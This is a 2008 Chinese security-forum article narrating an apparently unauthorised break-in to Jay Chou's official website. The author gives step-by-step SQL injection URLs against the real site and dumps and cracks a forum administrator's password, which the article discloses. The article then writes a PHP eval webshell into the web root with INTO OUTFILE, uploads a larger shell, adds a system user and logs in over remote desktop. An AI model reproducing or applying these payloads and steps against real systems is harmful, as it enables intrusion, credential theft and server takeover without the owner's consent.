首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
检测周杰伦官方网站
来源:www.vfcocus.net 作者:风流倜傥 发布时间:2008-12-01  
文章作者:风流倜傥
某日在cn群里聊天,有朋友丢出一个jay官方网站的注入点,闲着无聊就测试了下。没想到最后轻松的得到了系统权限。在取得webshell过程中遇到点困难,也学到了一点东西。
看注射点,老规矩,先提交个单引号,返回错误提示是
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
这个提示是很有玄机的,可以看到单引号没有转意,也就是说安全模式没有打开,这为我们后文得到webshell提供了机会。
下面猜字段吧,体力活的说
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,2,3,4
1.jpg (64.05 KB)
2008-11-29 20:49

很轻松的猜出是四个字段。然后还是按部就班的看用户和权限
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,2,3,version()
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,2,3,user()
Oh yeah!!是mysql5的root权限,看到这里我觉得服务器拿下应该问题不大了。
和mssql、oracle、db2等数据库一样,mysql5提供了一个系统数据库:information_schema
在这个数据库里我们可以得到很多信息,包括当前用户权限、当前用户权限下可以访问的数据库、表、列名,因此在sql注射中,导致直接暴区数据库,表列名
开始操作,提交
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME%20%20from%20information_schema.STATISTICS/*
貌似没有出现想象中的效果
提示
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
看来是union 前后字符集不搭配,只好编码一下了,提交
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,hex(TABLE_SCHEMA),hex(TABLE_NAME),hex(COLUMN_NAME)%20%20from%20information_schema.STATISTICS/*
这次正常了,连上我自己的mysql,将16进制的编码还原
2.jpg (45.15 KB)
2008-11-29 20:49

mysql> select 0x6A6179776562;
+----------------+
| 0x6A6179776562 |
+----------------+
| jayweb        |
+----------------+
1 row in set (0.00 sec)
mysql> select 0x41646D696E5F4964;
+--------------------+
| 0x41646D696E5F4964 |
+--------------------+
| Admin_Id       |
+--------------------+
1 row in set (0.00 sec)
mysql> select 0x61646D696E;
+--------------+
| 0x61646D696E |
+--------------+
| admin        |
+--------------+
1 row in set (0.00 sec)
这里表名出来了,是admin,但是没有暴出密码字段名,我们可以通过使用limit语法逐个表和字段查询,但是数据库很多表的话,不晓得什么时候才能摸清楚。刚好网站上有个phpbb的论坛,还是通过跨库查论坛数据库吧。
看了下,管理员有一个admin一个webmater,看样子webmater比较活跃,就查他的密码了。
提交
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,2,username,user_password%20%20from%20phpbb_users%20where%20user_id=66333
到www.cmd5.com上查询出来密码是 :042990
登陆后台去参观下吧 :)
3.jpg (97.25 KB)
2008-11-29 20:49

在后台琢磨了半天,尝试了添加上传类型等办法都没能得到webshell,难道只能渗透到这个程度吗?
喝杯水冷静了下,想起来我已经知道它的安全模式是关闭的而且我们有足够的权限,这意味着什么?嘿嘿,只要知道路径就能通过注射导出一个webshell。现在的问题就是得到路径了,利用uploadpic.php中getimagesize()函数的小bug,先在后台添加上传类型 text/asa,然后到前台传图片的地方传个asa文件,这个函数无法读取起大小,暴出错误时泄露了绝对路径
下面最辉煌的时刻终于要到来了,构造导出webshell的语句
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,2,'<?eval($_POST[cmd])?>',4%20from%20mysql.user%20into%20outfile%20'D:\\website\\jayweb\\forum\\userpix\\cnsst.php'/*
成功了!!
用客户端连上,传了个大马
由于编码问题看着有点乱,一样使用,执行命令看看
4.jpg (60.28 KB)
2008-11-29 20:49

好象服务器的php是系统权限的,添加了一个用户
连上3389参观下闪人

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·安全检测黑客防线
·对江西某电信服务器的一次安全检
·利用MS08067远程溢出漏洞抓肉鸡
·和我一起进行php渗透
·discuz6.1后台拿webshell方法
·目标站点dkxxw.com拿资料!
·实例:路由攻击 终结日本网站
·对某高级技工学校网站的安全检测
·对某农业专业网站的一次安全检测
·如何入侵基于JSP的网站
·MYSQL注入中load_file()函数的进
·入侵基于java Struts的JSP网站
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved